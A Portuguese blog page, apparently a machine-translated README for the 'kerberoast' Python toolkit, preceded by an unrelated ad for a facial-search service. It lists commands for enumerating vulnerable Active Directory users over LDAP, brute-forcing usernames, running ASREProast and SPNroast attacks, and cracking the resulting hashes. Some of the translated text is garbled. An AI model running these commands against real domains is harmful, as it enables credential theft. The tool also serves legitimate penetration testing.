Pular para o conteúdo principal

Compartilhe

Busca facial com inteligência artificial

Busca facial  com inteligência artificial O FaceSeek é um mecanismo de busca facial online avançado que utiliza tecnologia de reconhecimento facial de ponta para realizar buscas reversas de imagens na internet. Encontre facilmente fotos com rostos específicos com esta poderosa ferramenta. Arraste e solte ou cole a imagem CARREGAR UMA FOTO A imagem deve estar em um dos seguintes formatos: JPG, PNG, JPEG ou WEBP. Processo de busca seguro e privado por nome Jennifer Lawrence por nome Gal Gadot por nome Timothée Chalamet Como usar a busca facial com o FaceSeek FaceSeek: Sua solução completa para busca e reconhecimento facial online. Bem-vindo ao FaceSeek, o principal  mecanismo de busca facial online  , desenvolvido para ajudar você  a verificar fotos  ,  encontrar pessoas  e aumentar  a segurança online  . Nossa ferramenta ética  de busca facial utiliza  reconhecimento facial  avançado  para detectar falsificações e verificar...

Kerberoast - Ataque Kerberoast -Pure Python-


Kit de ferramentas de ataque Kerberos -pure python- 




Instalar

pip3 install kerberoast

Pré-requisitos

Python 3.6 Consulte requisitos.txt

Para o impaciente

IMPORTANTE: Os formatos de destino de URL aceitos para LDAP e Kerberos são os seguintes
<ldap_connection_url><protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>:<protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Etapas -com SSPI-: kerberoast auto <DC_ip>

Passos -SSPI não usado-:

  1. Procure usuários vulneráveis via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast contra usuários no ldapenum_asrep_users.txtarquivo
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast contra usuários no ldapenum_spn_users.txtarquivo
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast e ASPREP roast output com hashcat

Comandos

ldap

Este grupo de comando é para enumerar usuários potencialmente vulneráveis ​​via LDAP.

Estrutura de comando

    kerberoast ldap <type> <ldap_connection_url> <options>

Type: Suporta três tipos de usuários a serem enumerados

  1. spnEnumera usuários com servicePrincipalNameconjunto de atributos.
  2. asrepEnumera os usuários com DONT_REQ_PREAUTHsinalizador definido em seu atributo UAC.
  3. all Inicia todas as enumerações mencionadas acima.

ldap_connection_url: Especifica a credencial do usuário e o servidor de destino no formato de url msldap (consulte a ajuda)

options::
    -oNome da base do arquivo de saída

bruto

Este comando é para realizar a enumeração do nome de usuário forçando o serviço Kerberos com possíveis candidatos a nome de usuário

Estrutura de comando

    kerberoast brute <realm> <dc_ip> <targets> <options>

realm: O reino Kerberos geralmente se parece com COMPANY.corp
dc_ip: IP ou nome de host do controlador de domínio
targets: Caminho para o arquivo que contém os nomes de usuário possíveis
options::
    -oNome de base do arquivo de saída

uma rajada

Este comando é para realizar o ataque ASREProast

Estrutura de comando

    kerberoast asreproast <dc_ip> <options>

dc_ip: IP ou o nome do controlador de domínio
options:
    -rEspecifica o domínio Kerberos a ser utilizado. Ele substitui todas as outras informações do reino.
    -o: Nome de base do arquivo de saída
    -t: Caminho para o arquivo que contém os nomes de usuário para realizar o ataque
    -u: Especifica o usuário para realizar o ataque. O formato é <username>ou, <username>@<realm>mas no primeiro caso, a -ropção deve ser usada para especificar o domínio

spnroast

Este comando é para executar o ataque SPNroast (também conhecido como kerberoast).

Estrutura de comando

    kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Especifica a credencial do usuário e o servidor de destino no formato de URL Kerberos (consulte a ajuda)

options::
    -rEspecifica o reino Kerberos a ser usado. Ele substitui todas as outras informações do reino.
    -o: Nome de base do arquivo de saída
    -t: Caminho para o arquivo que contém os nomes de usuário para realizar o ataque
    -u: Especifica o usuário para realizar o ataque. O formato é <username>ou, <username>@<realm>mas no primeiro caso, a -ropção deve ser usada para especificar o domínio



Comentários

Como usar um Agente OSINT IA

Pericia Digital

Ebook

Postagens mais visitadas